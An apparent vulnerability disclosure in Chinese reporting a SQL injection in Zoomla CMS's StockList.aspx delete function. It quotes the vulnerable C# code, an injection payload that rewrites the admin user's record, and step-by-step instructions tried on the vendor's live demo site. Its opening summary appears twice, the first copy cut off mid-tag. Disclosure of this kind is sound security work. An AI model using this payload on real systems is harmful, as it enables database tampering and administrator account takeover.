### 简要描述: 话说 上次提交直接给忽略 那只好拿官方Demo做测试 另外此洞在2008年就已经存在 ### 详细说明: 此问题为UPdate类型 文件 /user/usershop/StockList.aspx 问题参数 Item 问题代码如下 ``` protected void Button3_Click(object sender, EventArgs e) { string text = base.Request.Form["Item"]; if (!string.IsNullOrEmpty(text) && this.bll.delstock(text))------------------此处 { base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>"); return; } base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>"); } public bool delstock(string str) { string strSql = "delete from ZL_UserStock where (id in (" + str + "))"; return SqlHelper.ExecuteSql(strSql, null); } ``` 构造参数 ``` 0))update ZL_User set Email='wooyun' where username='admin'-- //修改用户email YY此处可以更改为修改管理员密码 ``` 过程 登陆后访问 http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111 firebug修改页面<table>内容 图: [<img...
### 简要描述: 话说 上次提交直接给忽略 那只好拿官方Demo做测试 另外此洞在2008年就已经存在 ### 详细说明: 此问题为UPdate类型 文件 /user/usershop/StockList.aspx 问题参数 Item 问题代码如下 ``` protected void Button3_Click(object sender, EventArgs e) { string text = base.Request.Form["Item"]; if (!string.IsNullOrEmpty(text) && this.bll.delstock(text))------------------此处 { base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>"); return; } base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>"); } public bool delstock(string str) { string strSql = "delete from ZL_UserStock where (id in (" + str + "))"; return SqlHelper.ExecuteSql(strSql, null); } ``` 构造参数 ``` 0))update ZL_User set Email='wooyun' where username='admin'-- //修改用户email YY此处可以更改为修改管理员密码 ``` 过程 登陆后访问 http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111 firebug修改页面<table>内容 图: [<img src="https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png) 内容如下: ``` <table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border"> <tbody><tr align="center" style="background:#FFBD59"> <td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td> <td width="13%" class="title">单据类型</td> <td width="20%" class="title">单据编号</td> <td width="15%" class="title"> 录入时间</td> <td width="12%" class="title"> 录入者</td> <td width="20%" class="title"> 备注</td> <td width="15%" class="title"> 操作</td> </tr> <tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg"> <td height="22" align="center"><input type="checkbox" value="3" name="Item"></td> <td height="22" align="center">出库</td> <td height="22" align="center">订单</td> <td height="22" align="center">2014/5/14 21:54:09</td> <td height="22" align="center">admin</td> <td height="22" align="center">好家伙</td> <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=3">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=3">删除</a></td> </tr> <tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg"> <td height="22" align="center"><input type="checkbox" value="2" name="Item"></td> <td height="22" align="center">出库</td> <td height="22" align="center">订单</td> <td height="22" align="center">2014/5/14 21:54:09</td> <td height="22" align="center">admin</td> <td height="22" align="center">好家伙</td> <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=2">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=2">删除</a></td> </tr> <tr class="tdbg"> <td height="22" align="center" class="tdbgleft" colspan="10">共 <span id="Allnum">2</span> 条记录 <span id="Toppage"><a href="?Stocktype=0&Currentpage=0">首页</a></span> <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&Currentpage=0">上一页</a></span> <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&Currentpage=1">下一页</a></span> <span id="Endpage"><a href="?Stocktype=0&Currentpage=1">尾页</a></span> 页次:<span id="Nowpage">1</span>/<span id="PageSize">1</span>页 <span id="pagess">10</span>条记录/页 转到第<select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1"> <option value="1">1</option> </select>页</td> </tr> </tbody></table> ``` 修改复选框中的value [<img src="https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png" alt="Value.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png) 然后点击删除按钮即可 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png) 本地下载的 CMS2 V1.3 V1.4 V1.5、 CMS6.0均受影响 另外 从最早的一个文件来看此洞在2008年就已经存在
